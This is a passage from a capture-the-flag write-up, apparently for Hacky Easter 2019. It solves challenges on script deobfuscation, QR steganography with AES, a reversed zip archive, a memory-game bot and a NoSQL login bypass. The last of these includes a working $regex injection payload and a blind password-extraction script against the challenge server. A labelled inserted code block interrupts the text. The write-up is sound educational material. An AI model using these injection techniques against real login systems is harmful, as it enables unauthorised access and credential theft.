$3 really a very boring type of argument&quot;\nexit -1\nfi\nif &#x5B; &quot;$5&quot; != &quot;-b&quot; ]; then\necho &quot;I&#039;m clueless why you bring such a strange argument as $5?. I know you can do better&quot;\nexit -1\nfi\nif &#x5B; &quot;$7&quot; != &quot;-I&quot; ]; then\necho &quot;$7 always makes me mad. If you wanna discuss with be, then you should bring the right type of arguments, really!&quot;\nexit -1\nfi\nif &#x5B; &quot;$9&quot; != &quot;-t&quot; ]; then\necho &quot;No, no, you don&#039;t get away with this $9 one! I know it&#039;s difficult to meet my requirements. I doubt you will&quot;\nexit -1\nfi\necho &quot;Ahhhh, finally! Let&#039;s discuss your arguments&quot;\nfunction isNr() {\n&#x5B;&#x5B; ${1} =~ ^&#x5B;0-9]{1,3}$ ]]\n}\nif isNr $2 &amp;&amp; isNr $4 &amp;&amp; isNr $6 &amp;&amp; isNr $8 &amp;&amp; isNr ${10} ; then\necho &quot;...&quot;\nelse\necho &quot;Nice arguments, but could you formulate them as numbers between 0 and 999, please?&quot;\nexit -1\nfi\nlow=0\nmatch=0\nhigh=0\nfunction e() {\nif &#x5B;&#x5B; $1 -lt $2 ]]; then\nlow=$((low + 1))\nelif &#x5B;&#x5B; $1 -gt $2 ]]; then\nhigh=$((high + 1))\nelse\nmatch=$((match + 1))\nfi\n}\ne $2 465\ne $4 333\ne $6 911\ne $8 112\ne ${10} 007\nfunction b () {\ntype &quot;$1&quot; &amp;&gt; \/dev\/null ;\n}\nif &#x5B;&#x5B; $match -eq 5 ]]; then\nt=&quot;$Az$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Ez$Fz$Kz$Lz$Mz$Nz$Oz$Pz$Ez$Fz$Gz$Hz$Iz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$mz$nz$oz$Zz$pz$qz$rz&quot;\necho &quot;Great, that are the perfect arguments. It took some time, but I&#039;m glad, you see it now, too!&quot;\nsleep 2\nif b x-www-browser ; then\nx-www-browser $t\nelse\necho &quot;Find your egg at $t&quot;\nfi\nelse\necho &quot;I&#039;m not really happy with your arguments. 
I&#039;m still not convinced that those are reasonable statements...&quot;\necho &quot;low: $low, matched $match, high: $high&quot;\nfi\n<\/pre><\/div>\n<br\/>Again there are a few variable definitions at the beginning followed by different tests on the given arguments. Without actually digging deeper into these tests, we can see that a variable called <code>t<\/code> is defined at the bottom, which uses the formerly defined variables. So let&#8217;s copy&#038;paste the variable definitions from the beginning as well as the definition of <code>t<\/code> to a new script and output the variable <code>t<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg07# cat solution.sh\nz=&quot;\n&quot;;Cz=&#039;s:&#039;;qz=&#039;.p&#039;;fz=&#039;8a&#039;;az=&#039;e9&#039;;Oz=&#039;co&#039;;Xz=&#039;a6&#039;;hz=&#039;7e&#039;;Rz=&#039;im&#039;;Bz=&#039;tp&#039;;lz=&#039;62&#039;;Kz=&#039;in&#039;;Wz=&#039;s\/&#039;;rz=&#039;ng&#039;;Yz=&#039;1e&#039;; Jz=&#039;r.&#039;;Iz=&#039;te&#039;;Tz=&#039;es&#039;;Zz=&#039;f3&#039;;kz=&#039;15&#039;;Az=&#039;ht&#039;;Fz=&#039;ck&#039;;Uz=&#039;\/e&#039;;Sz=&#039;ag&#039;;Lz=&#039;g-&#039;;Ez=&#039;ha&#039;;Vz=&#039;gg&#039;;Pz=&#039;m\/&#039;;pz=&#039;8c&#039;;Gz=&#039;ye&#039;;Dz=&#039;\/\/&#039;;iz=&#039;cd&#039;;Hz=&#039;as&#039;;Mz=&#039;la&#039;;Nz=&#039;b.&#039;;nz=&#039;c7&#039;;Qz=&#039;r\/&#039;;ez=&#039;d8&#039;; cz=&#039;ac&#039;;gz=&#039;12&#039;;bz=&#039;75&#039;;oz=&#039;4a&#039;;mz=&#039;42&#039;;jz=&#039;6e&#039;;dz=&#039;b7&#039;;\nt=&quot;$Az$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Ez$Fz$Kz$Lz$Mz$Nz$Oz$Pz$Ez$Fz$Gz$Hz$Iz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$mz$nz$oz$Zz$pz$qz$rz&quot;\necho $t\n\n<\/pre><\/div>\n<br\/>Running this script outputs the content of <code>t<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; 
notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg07# bash solution.sh\nhttps:\/\/hackyeaster.hacking-lab.com\/hackyeaster\/images\/eggs\/a61ef3e975acb7d88a127ecd6e156242c74af38c.png\n<\/pre><\/div>\n<br\/>&#8230; which contains the URL of the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg07_01.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-Bxvs-Vno1-9l9D-49gX<\/span>.\n<br\/>\n<h1 id=\"chlg08\">08 &#8211; Modern Art<\/h1>\nThe challenge provides the following image:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg08_01.jpg\" width=\"400\"\/>\n<br\/>\n<br\/>The corners of the QR code are covered by another four QR codes, which are all the same:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg08_02.jpg\" \/>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# zbarimg little_qrcode.jpg\nQR-Code:remove me\nscanned 1 barcode symbols from 1 images in 0 seconds\n<\/pre><\/div>\n<br\/>The QR code decodes to <code>remove me<\/code>. 
Thus I tried to fix the big QR code by replacing the little QR codes with the appropriate pixels using <code>GIMP<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg08_03.jpg\" width=\"400\"\/>\n<br\/>\n<br\/>Scanning this QR still doesn&#8217;t reveal the flag:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# zbarimg big_qrcode.jpg\nQR-Code:Isn&#039;t that a bit too easy?\nscanned 1 barcode symbols from 1 images in 0.05 seconds\n<\/pre><\/div>\n<br\/>So we can try to run <code>strings<\/code> on the original image, which reveals an unusual hex-value as well as a value called <code>KEY<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [8,9]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# strings modernart.jpg | less\n4\\Zq\n:&#039;?&lt;\n        ~T\n`Zq(\n D@,\n...\n(E7EF085CEBFCE8ED93410ACF169B226A)\n(KEY=1857304593749584)\n...\n\n<\/pre><\/div>\n<br\/>The hex-value might be some cipher text, which has been encrypted using the key. 
Since we do not have any further information yet, let&#8217;s continue analyzing the image.\n<br\/>\n<br\/>When viewing the file with <code>hexdump<\/code>, an unusual pattern can be recognized at the end of the file:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# hexdump -C modernart.jpg\n00000000  ff d8 ff db 00 43 00 01  01 01 01 01 01 01 01 01  |.....C..........|\n00000010  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|\n*\n00000040  01 01 01 01 01 01 01 ff  db 00 43 01 01 01 01 01  |..........C.....|\n00000050  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |................|\n*\n00000080  01 01 01 01 01 01 01 01  01 01 01 01 ff c2 00 11  |................|\n00000090  08 01 f4 01 f4 03 01 11  00 02 11 01 03 11 01 ff  |................|\n000000a0  c4 00 1a 00 01 00 03 01  01 01 00 00 00 00 00 00  |................|\n000000b0  00 00 00 00 00 08 09 0a  07 06 05 ff c4 00 14 01  |................|\n000000c0  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\n000000d0  00 ff da 00 0c 03 01 00  02 10 03 10 00 00 01 a1  |................|\n000000e0  f2 6f 83 9f 9d fc 98 04  7f 39 f9 67 e5 60 1e 00  |.o.......9.g.`..|\n000000f0  11 7c d4 f1 3f c0 00 11  fc c4 18 00 00 69 f4 b7  |.|..?........i..|\n00000100  f3 20 44 00 35 fa 4f f3  10 47 00 07 7f 36 fa 01  |. D.5.O..G...6..|\n00000110  50 06 60 80 2f f8 bf e0  0c 81 1e 7c f4 07 1f 26  |P.`.\/......|...&amp;|\n...\n00022790  20 20 e2 96 84 20 e2 96  88 20 e2 96 84 e2 96 80  |  ... ... ......|\n000227a0  20 e2 96 84 20 20 0a 20  e2 96 84 e2 96 84 e2 96  | ...  . ........|\n000227b0  84 e2 96 84 e2 96 84 e2  96 84 e2 96 84 20 e2 96  |............. ..|\n000227c0  88 e2 96 80 e2 96 84 e2  96 88 20 e2 96 88 e2 96  |.......... .....|\n000227d0  84 e2 96 88 20 e2 96 80  e2 96 80 20 20 20 0a 20  |.... ......   . 
|\n000227e0  e2 96 88 20 e2 96 84 e2  96 84 e2 96 84 20 e2 96  |... ......... ..|\n000227f0  88 20 e2 96 88 e2 96 88  e2 96 84 e2 96 88 e2 96  |. ..............|\n00022800  80 e2 96 88 e2 96 84 e2  96 88 e2 96 80 e2 96 80  |................|\n00022810  e2 96 84 20 e2 96 88 20  0a 20 e2 96 88 20 e2 96  |... ... . ... ..|\n00022820  88 e2 96 88 e2 96 88 20  e2 96 88 20 e2 96 84 20  |....... ... ... |\n00022830  e2 96 80 20 e2 96 84 20  e2 96 80 e2 96 80 e2 96  |... ... ........|\n00022840  84 e2 96 88 e2 96 80 e2  96 80 e2 96 84 20 0a 20  |............. . |\n00022850  e2 96 88 e2 96 84 e2 96  84 e2 96 84 e2 96 84 e2  |................|\n00022860  96 84 e2 96 88 20 e2 96  88 e2 96 80 e2 96 88 20  |..... ......... |\n00022870  e2 96 84 20 e2 96 88 e2  96 80 20 20 e2 96 88 e2  |... ......  ....|\n00022880  96 80 e2 96 88 20 0a                              |..... .|\n00022887\n\n<\/pre><\/div>\n<br\/>This seems to be <i>UTF-8<\/i>, which can be outputed by using the option <code>-e S<\/code> with <code>strings<\/code> (-e = encoding, S = single-8-bit-byte characters):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# strings -e S modernart.jpg\n\u2592\u2592\u2592\u2592\n\u2592\u2592o\u2592\u2592\u2592\u2592\n9\u2592g\u2592`\n|\u2592\u2592?\u2592\ni\u2592\u2592 D\n5\u2592O\u2592\n...\n\u0c85\u2592-_P\u2592\u2592b\u2592\nP\u2592\u0154,fX\u2592\u2592\u2592\u2592\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584 \u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2588 \u2584\u2584\u2584 \u2588 \u2584\u2588\u2580\u2588\u2584 \u2588 \u2584\u2584\u2584 \u2588\n \u2588 \u2588\u2588\u2588 \u2588  \u2580\u2584\u2580\u2584 \u2588 \u2588\u2588\u2588 \u2588\n \u2588\u2584\u2584\u2584\u2584\u2584\u2588 \u2584 \u2584 \u2588 \u2588\u2584\u2584\u2584\u2584\u2584\u2588\n \u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2588\u2588\u2584\u2588\u2580\u2584\u2584   
\u2584\n \u2584\u2588\u2584\u2580\u2584\u2584\u2584\u2588\u2580\u2584\u2580 \u2584 \u2580 \u2584\u2580\u2580\u2580\u2584\n \u2580\u2588\u2584\u2588 \u2580\u2584\u2588\u2580   \u2584 \u2588 \u2584\u2580 \u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2588\u2580\u2584\u2588 \u2588\u2584\u2588 \u2580\u2580\n \u2588 \u2584\u2584\u2584 \u2588 \u2588\u2588\u2584\u2588\u2580\u2588\u2584\u2588\u2580\u2580\u2584 \u2588\n \u2588 \u2588\u2588\u2588 \u2588 \u2584 \u2580 \u2584 \u2580\u2580\u2584\u2588\u2580\u2580\u2584\n \u2588\u2584\u2584\u2584\u2584\u2584\u2588 \u2588\u2580\u2588 \u2584 \u2588\u2580  \u2588\u2580\u2588\n<\/pre><\/div>\n<br\/>Another QR code! By simply taking a screenshot we can scan the new QR code:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg08_04.png\" \/>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# zbarimg new_qrcode.png\nQR-Code:AES-128\nscanned 1 barcode symbols from 1 images in 0 seconds\n<\/pre><\/div>\n<br\/>The QR code decodes to <code>AES-128<\/code>. 
This suggests that we can decode the string we found using the key and the algorithm <code>AES-128<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg08# python\nPython 2.7.15+ (default, Feb  3 2019, 13:13:16)\n&#x5B;GCC 8.2.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; from Crypto.Cipher import AES\n&gt;&gt;&gt; cipher = AES.new(&#039;1857304593749584&#039;, AES.MODE_ECB)\n&gt;&gt;&gt; cipher.decrypt(&#039;E7EF085CEBFCE8ED93410ACF169B226A&#039;.decode(&#039;hex&#039;))\n&#039;Ju5t_An_1mag3\\x03\\x03\\x03&#039;\n<\/pre><\/div>\n<br\/>Entering the password <code>Ju5t_An_1mag3<\/code> in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg08_05.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-Ydks-4V9o-Hn6p-RZ1A<\/span>.\n<br\/>\n<h1 id=\"chlg09\">09 &#8211; rorriM rorriM<\/h1>\nThe challenge provides a file called <code>evihcra.piz<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg09# file evihcra.piz\nevihcra.piz: data\n<\/pre><\/div>\n<br\/>The <code>file<\/code> tool does not recognize any known file format. 
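As an added example that is not part of the original writeup, the following Python check generalizes the magic-number test that the file tool performs: it looks for a known signature at the start of the data and, written backwards, at its end, which is how a byte-reversed file presents itself, and it mirrors a filename's stem and extension separately. The ZIP used as input is constructed in memory, not the challenge file:

```python
import io
import zipfile

# Signatures the check knows about; extend as needed.
MAGIC = {
    "zip":  b"PK\x03\x04",
    "png":  b"\x89PNG\r\n\x1a\n",
    "jpeg": b"\xff\xd8\xff",
    "gzip": b"\x1f\x8b",
    "pdf":  b"%PDF-",
}


def identify(data):
    """Return (format, orientation).

    orientation is "normal" when a known signature opens the data and
    "reversed" when a known signature appears backwards at its end, which
    is what a byte-reversed file looks like.  (None, None) otherwise.
    """
    for name, sig in MAGIC.items():
        if data.startswith(sig):
            return name, "normal"
    for name, sig in MAGIC.items():
        if data.endswith(sig[::-1]):
            return name, "reversed"
    return None, None


def unmirror(data):
    """Undo byte reversal; a no-op for data that already starts with a known magic."""
    return data if identify(data)[1] == "normal" else data[::-1]


def unmirror_name(name):
    """'evihcra.piz' -> 'archive.zip': stem and extension are mirrored separately."""
    stem, dot, ext = name.rpartition(".")
    return stem[::-1] + dot + ext[::-1] if dot else name[::-1]


def constructed_sample():
    """A small real ZIP built in memory and then byte-reversed (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("egg.txt", "constructed sample payload")
    return buf.getvalue()[::-1]


def recover_zip_listing(mirrored):
    """Unmirror and read every member, proving the result is a usable ZIP."""
    fixed = unmirror(mirrored)
    with zipfile.ZipFile(io.BytesIO(fixed)) as zf:
        return {info.filename: zf.read(info.filename) for info in zf.infolist()}


if __name__ == "__main__":
    sample = constructed_sample()
    print(identify(sample))                 # ('zip', 'reversed')
    print(unmirror_name("evihcra.piz"))     # archive.zip
    print(recover_zip_listing(sample))
```

The reversed-signature test is cheap enough to add to any triage script that runs file-type detection: a container whose magic is only found backwards at the end is worth a second look before it is dismissed as "data".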
When viewing the file with <code>hexdump<\/code>, we can see that the file ends with <code>\\x04\\x03KP<\/code>, which is the reverse of <code>PK\\x03\\x04<\/code> (= the magic number of a zip archive):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg09# hexdump -C evihcra.piz\n00000000  00 00 00 01 08 63 00 00  00 5b 00 01 00 01 00 00  |.....c...&#x5B;......|\n00000010  00 00 06 05 4b 50 01 d4  b2 23 98 dd 9f dd 01 d4  |....KP...#......|\n...\n000108c0  08 3c a3 18 78 dc 4e 36  43 29 00 08 00 00 00 14  |.&lt;..x.N6C)......|\n000108d0  04 03 4b 50                                       |..KP|\n000108d4\n<\/pre><\/div>\n<br\/>Combining this with the challenge&#8217;s description (<i>rorriM rorriM<\/i> = <code>reverse(\"Mirror Mirror\")<\/code>) suggests that the file must be read in reverse. Applying this to the filename as well reveals that the actual filename is <code>evihcra.piz<\/code> = <code>archive.zip<\/code>, which makes perfect sense.\n<br\/>\n<br\/>The following python script reads the given file and creates a new file with a reversed filename, extension and actual content:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\nimport sys\n\n# stem and extension of the given name are mirrored separately\nfilename,ext = sys.argv&#x5B;1].split(&#039;.&#039;)\n# read the raw bytes in binary mode so nothing is altered on the way\nct = open(filename+&#039;.&#039;+ext, &#039;rb&#039;).read()\n\n# reversed stem + reversed extension = the real filename; the content is reversed too\nout = open(filename&#x5B;::-1]+&#039;.&#039;+ext&#x5B;::-1], &#039;wb&#039;)\nout.write(ct&#x5B;::-1])\nout.close()\n<\/pre><\/div>\n<br\/>Running the script on <code>evihcra.piz<\/code> creates a new file called <code>archive.zip<\/code>, which is actually a zip archive:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg09# .\/mirror.py evihcra.piz\nroot@kali:~\/Documents\/he19\/egg09# file 
archive.zip\narchive.zip: Zip archive data, at least v2.0 to extract\n<\/pre><\/div>\n<br\/>The archive contains a file called <code>90gge.gnp<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg09# unzip archive.zip\nArchive:  archive.zip\n  inflating: 90gge.gnp\ne, 69031 bytes uncompressed, 67644 bytes compressed:  2.0%\n<\/pre><\/div>\n<br\/>Viewing this file with <code>hexdump<\/code> we can see that it actually seems to be a PNG image:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg09# hexdump -C 90gge.gnp\n00000000  89 47 4e 50 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.GNP........IHDR|\n00000010  00 00 01 e0 00 00 01 e0  08 06 00 00 00 7d d4 be  |.............}..|\n00000020  95 00 00 00 04 67 41 4d  41 00 00 b1 8f 0b fc 61  |.....gAMA......a|\n...\n<\/pre><\/div>\n<br\/>The only thing that does not match an actual PNG image here is that the header contains <code>GNP<\/code> instead of <code>PNG<\/code>. So let&#8217;s fix this in a hex editor:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg09_01.png\" \/>\n<br\/>\n<br\/>Now the file is actually a PNG image:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg09_02.png\" width=\"200\"\/>\n<br\/>\n<br\/>The only thing left to do is to flip the image (e.g. in <code>GIMP<\/code>: <code>Image -> Transform -> Flip Horizontally<\/code>) and to invert the colors (<code>GIMP<\/code>: <code>Colors -> Invert<\/code>). 
The resulting image is the desired egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg09_03.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-VFTD-kVos-DeL1-lATA<\/span>.\n<br\/>\n<h1 id=\"chlg10\">10 &#8211; Stackunderflow<\/h1>\nThe challenge provides a link to a <a href=\"https:\/\/stackoverflow.com\/\" target=\"_new\" rel=\"noopener noreferrer\">stackoverflow<\/a>-like website:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_01.png\" width=\"800\"\/>\n<br\/>\n<br\/>The first notable piece of information on the front page is that the database is being migrated to support humongous amounts of questions.\n<br\/>\n<br\/>As of now, the number of questions seems to be quite limited:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_02.png\" width=\"800\"\/>\n<br\/>\n<br\/>However, there is actually a question, which was asked by <code>the_admin<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_04.png\" width=\"800\"\/>\n<br\/>\n<br\/>This hints that some kind of NoSQL database is in place.\n<br\/>\n<br\/>Also, there is another interesting question:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_03.png\" width=\"800\"\/>\n<br\/>\n<br\/>Keeping this in mind and googling for <code>nosql injection<\/code> brings up a few interesting websites: <a href=\"https:\/\/www.owasp.org\/index.php\/Testing_for_NoSQL_injection\" target=\"_new\" rel=\"noopener noreferrer\">OWASP<\/a>, <a href=\"https:\/\/www.owasp.org\/images\/e\/ed\/GOD16-NOSQL.pdf\" target=\"_new\" rel=\"noopener noreferrer\">OWASP<\/a>, <a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/tree\/master\/NoSQL%20Injection\" target=\"_new\" 
rel=\"noopener noreferrer\">PayloadsAllTheThings<\/a>&#8230;\n<br\/>\n<br\/>By default the login page makes a POST request with the <code>Content-Type<\/code> <code>application\/x-www-form-encoded<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_05.png\" \/>\n<br\/>\n<br\/>In order to bypass the login, we have to change the <code>Content-Type<\/code> to <code>application\/json<\/code> and set the body to be actually JSON. We already know the username <code>the_admin<\/code> and for the password we can simply insert an all-matching regex:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_06.png\" \/>\n<br\/>\n<br\/>Using the returned session id (cookie <code>connect.sid<\/code>), we are logged in with the user <code>the_admin<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_07.png\" \/>\n<br\/>\n<br\/>On the website itself there is no flag after the login, which means that we are probably supposed to reveal the actual password of the user <code>the_admin<\/code>.\n<br\/>\n<br\/>In order to do this, I wrote the following python script, which uses the <code>$regex<\/code> function to reveal the password letter by letter (like in a blind SQL scenario):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nimport requests\n\ncharset = &#039;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_&#039;\nurl = &#039;http:\/\/whale.hacking-lab.com:3371\/login&#039;\npwd = &#039;&#039;\n\ncont = True\nwhile (cont):\n  cont = False\n  for c in charset:\n    j = {&quot;username&quot;:&quot;null&quot;, &quot;password&quot;:{&quot;$regex&quot;: &quot;^&quot;+pwd+c}}\n    r = requests.post(url, json=j, allow_redirects=False)\n    if (r.text == &#039;Found. 
Redirecting to \/&#039;):\n      print(&#039;got letter: &#039; +c)\n      pwd += c\n      print(&#039;pwd until now: &#039;+pwd)\n      cont = True\n<\/pre><\/div>\n<br\/>Running the script reveals the password:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg10# .\/getPassword.py\ngot letter: N\npwd until now: N\ngot letter: 0\npwd until now: N0\ngot letter: S\npwd until now: N0S\ngot letter: Q\npwd until now: N0SQ\ngot letter: L\npwd until now: N0SQL\ngot letter: _\npwd until now: N0SQL_\ngot letter: i\npwd until now: N0SQL_i\ngot letter: n\npwd until now: N0SQL_in\ngot letter: j\npwd until now: N0SQL_inj\ngot letter: e\npwd until now: N0SQL_inje\ngot letter: c\npwd until now: N0SQL_injec\ngot letter: t\npwd until now: N0SQL_inject\ngot letter: i\npwd until now: N0SQL_injecti\ngot letter: o\npwd until now: N0SQL_injectio\ngot letter: n\npwd until now: N0SQL_injection\ngot letter: s\npwd until now: N0SQL_injections\ngot letter: _\npwd until now: N0SQL_injections_\ngot letter: a\npwd until now: N0SQL_injections_a\ngot letter: r\npwd until now: N0SQL_injections_ar\ngot letter: e\npwd until now: N0SQL_injections_are\ngot letter: _\npwd until now: N0SQL_injections_are_\ngot letter: a\npwd until now: N0SQL_injections_are_a\ngot letter: _\npwd until now: N0SQL_injections_are_a_\ngot letter: t\npwd until now: N0SQL_injections_are_a_t\ngot letter: h\npwd until now: N0SQL_injections_are_a_th\ngot letter: i\npwd until now: N0SQL_injections_are_a_thi\ngot letter: n\npwd until now: N0SQL_injections_are_a_thin\ngot letter: g\npwd until now: N0SQL_injections_are_a_thing\n<\/pre><\/div>\n<br\/>Entering the password <code>N0SQL_injections_are_a_thing<\/code> in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg10_08.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is 
<span class=\"spanFlag\">he19-nq5W-zLwY-iX3Q-iw1Q<\/span>.\n<br\/>\n<h1 id=\"chlg11\">11 &#8211; Memeory 2.0<\/h1>\nThe challenge provides a link to the following website:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg11_01.png\" width=\"900\"\/>\n<br\/>\n<br\/>The pictures behind the cards are numbered from 1 to 98:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg11_02.png\" width=\"900\"\/>\n<br\/>\n<br\/>After selecting two cards a POST request to <code>\/solve<\/code> is sent with the two parameters <code>first<\/code> and <code>second<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg11_03.png\" width=\"900\"\/>\n<br\/>\n<br\/>If the cards are selected to slow, an error is raised and we have lost the game:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg11_04.png\" width=\"900\"\/>\n<br\/>\n<br\/>In order to solve this challenge automatically, we can write a python script, which:\n<br\/><ul style=\"margin-top:8px;margin-bottom:-15px\"><li>downloads all images<\/li><li>calculates the md5 checksum of the images<\/li><li>compares the md5 checksums in order to find matching images<\/li><li>submits the id of the matching images to the <code>\/solve<\/code> endpoint<\/li><\/ul>\n<br\/>\n<br\/>The following script does this:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n\n#!\/usr\/bin\/env python\n\nimport requests\nimport hashlib\n\ns = requests.Session()\n\nwhile True:\n  hashes = &#x5B;]\n  s.get(&#039;http:\/\/whale.hacking-lab.com:1111\/&#039;)\n\n  for i in range(98):\n    r = s.get(&#039;http:\/\/whale.hacking-lab.com:1111\/pic\/&#039;+str(i+1))\n    m = hashlib.sha256()\n    m.update(r.content)\n    hashes.append(m.hexdigest())\n\n  
